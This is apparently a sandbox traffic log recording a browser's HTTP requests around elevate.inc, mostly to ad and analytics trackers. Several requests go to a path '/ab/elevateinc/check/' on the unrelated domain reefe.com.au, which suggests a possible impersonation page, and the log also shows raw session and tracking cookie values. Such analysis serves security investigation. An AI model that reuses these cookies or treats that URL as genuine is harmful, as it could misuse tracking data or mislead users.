Source: global traffic	HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749250529827&cv=11&fst=1749250529827&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: test_cookie=CheckForPermission
Source: global traffic	HTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749250529836&cv=11&fst=1749250529836&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: test_cookie=CheckForPermission
Source: global traffic	HTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /s/0.8.9/clarity.js HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: CLID=15e084584fed44b9ac7d3d31dd5d9cd2.20250606.20260606
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/177991084:1749248960:-8Kawm3IciHVqcNU-Zpk-ui_jcGRuh1nJdIMQDlmFLA/94bb7f6409043594/fZ15QtuaFynigc5oFtv9UIzWlv64H8Euv6MNWm1fXm8-1749250529-1.2.1.1-Je8Rq7LnosMOhurC2gpYKK37AwHhO3lKPm0NE76BI6c8O0CwRQdGp2Cd4hkFHbDH HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: bcookie="v=2&bf7b89c0-f35c-4470-8d60-e42490e31dbb"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749250531:t=1749336931:v=2:sig=AQFtc4yW-KwEQoHJ1IQNpZOSDBCJoZke"priority: i
Source: global traffic	HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529827&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz6dzJ3_qA7rACDWNFiLJXUQcalFWhUfqZGSZr0ZdNUmqCYJxy&random=1854421802&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529836&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz3z_63NIbJ_BEuMxCAbSeBr_ld_ZxLX-dKHc7damxYyS-2gso&random=84112030&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority:
Source: global traffic	HTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749250530194&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /px/li_sync?redirect=https%3A%2F%2Fpx.ads.linkedin.com%2Fcollect%3Fv%3D2%26fmt%3Djs%26pid%3D3682316%26time%3D1749250530194%26li_adsId%3D71ff584c-f69a-4b49-9c70-b622d9cfe41f%26url%3Dhttps%253A%252F%252Fwww.elevate.inc%252F%26tm%3Dgtmv2%26cookiesTest%3Dtrue%26liSync%3Dtrue HTTP/1.1host: www.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: bcookie="v=2&bf7b89c0-f35c-4470-8d60-e42490e31dbb"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749250531:t=1749336931:v=2:sig=AQFtc4yW-KwEQoHJ1IQNpZOSDBCJoZke"cookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwpriority: i
Source: global traffic	HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529836&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz3z_63NIbJ_BEuMxCAbSeBr_ld_ZxLX-dKHc7damxYyS-2gso&random=84112030&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749250529827&cv=11&fst=1749247200000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDZpuyz6dzJ3_qA7rACDWNFiLJXUQcalFWhUfqZGSZr0ZdNUmqCYJxy&random=1854421802&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwcookie: ar_debug=1cookie: bcookie="v=2&81ef1bcc-26bf-4c20-8b13-fd440b4eb363"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749250532:t=1749336932:v=2:sig=AQFSewUB2NSph3F4iXCd7msjxoSeAZhD"cookie: __cf_bm=NwKfd91qktyIuEa3KYNGSHzcaBfVGfYu1Y0QH_goKrU-1749250532-1.0.1.1-CZ0Vtnpuk5Zh9nfjE4w4suHKzTMnWqlFcJMb96abSr21J6vwVQEUrEr9RwYmxSG68gs01RmQ75mkaefrzhQxupR9vUeY.GtpOAL7bhk755spriority: i
Source: global traffic	HTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749250530194&li_adsId=71ff584c-f69a-4b49-9c70-b622d9cfe41f&url=https%3A%2F%2Fwww.elevate.inc%2F&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=5644dc01-351c-4e14-b7ff-1d357614844ecookie: UserMatchHistory=AQKoA-Gem2NZlgAAAZdHdOLRlIqdUIWqwM5eCpkp7-hsOfs6ctmr3zVPTY1ikGtdFYeRmBhbQzqFAwcookie: AnalyticsSyncHistory=AQLyhRptmVl-dgAAAZdHdOLRRlI2O0KL_NFCG-gRHhxc-5OW13w7GiRCuGam8r-zL0lIjSbTwSax9AwmUWlRLwcookie: ar_debug=1cookie: bcookie="v=2&81ef1bcc-26bf-4c20-8b13-fd440b4eb363"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749250532:t=1749336932:v=2:sig=AQFSewUB2NSph3F4iXCd7msjxoSeAZhD"cookie: __cf_bm=NwKfd91qktyIuEa3KYNGSHzcaBfVGfYu1Y0QH_goKrU-1749250532-1.0.1.1-CZ0Vtnpuk5Zh9nfjE4w4suHKzTMnWqlFcJMb96abSr21J6vwVQEUrEr9RwYmxSG68gs01RmQ75mkaefrzhQxupR9vUeY.GtpOAL7bhk755spriority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1997378774:1749248979:04BudNpFxJAJsVptb57CinVOfR6ZD9ct5KPQ32_d-vc/94bb7f6b5a0e3594/lqKpGLpwgiuR79B9ezenbcotLFsnzO6XPZ8ZEj7pQJA-1749250531-1.2.1.1-ekq2wY6AobRExZ7VlAYsMQTsxkvHwgHrZDzxUllcX.1WojuIMEM8i5mRJKS54d9b HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2F&pu=https%3A%2F%2Fwww.elevate.inc%2F&t=AI-Powered+Benefits+Administration+Software+Solutions+%7C+Elevate&cts=1749250532422&vi=2f11d3f62927f5ffaf236e0c5c53f500&nc=true&u=761582.2f11d3f62927f5ffaf236e0c5c53f500.1749250532419.1749250532419.1749250532419.1&b=761582.1.1749250532419&cc=15 HTTP/1.1host: track.hubspot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2F&pu=https%3A%2F%2Fwww.elevate.inc%2F&t=AI-Powered+Benefits+Administration+Software+Solutions+%7C+Elevate&cts=1749250532422&vi=2f11d3f62927f5ffaf236e0c5c53f500&nc=true&u=761582.2f11d3f62927f5ffaf236e0c5c53f500.1749250532419.1749250532419.1749250532419.1&b=761582.1.1749250532419&cc=15 HTTP/1.1host: track.hubspot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: __cf_bm=QSQh5gGYN6WL9ofWeMfkNck545Yzz91ucGyDVKCv5hk-1749250533-1.0.1.1-g4GRMQig2VGUI7p98jrQBQYHgZmp_REWXDcTHljYCz0c3nfcW6u4l7.UDDFgDi7JLUsPi.fi5C1y0pgOyTBZp832.0zzOsZG6llzHtqZUWwcookie: _cfuvid=eKqC7PZbd_iKmVVxg7M86FI1DkbVwyXtKoUAw3y9W94-1749250533737-0.0.1.1-604800000priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1host: cdnjs.cloudflare.comorigin: https://reefe.com.ausec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=7E03B6E45C464D998B125395443D9131&RedC=c.clarity.ms&MXFR=1D7932C8BA8B6B393C4324CBBE8B65C6 HTTP/1.1host: c.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=7E03B6E45C464D998B125395443D9131&MUID=25FDF19892606E953408E79B93376F8D HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Tcookie: MUID=1D7932C8BA8B6B393C4324CBBE8B65C6priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f676d193594/1749250531029/Tx3Hc3TPAQTyq5D HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hk1y9/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
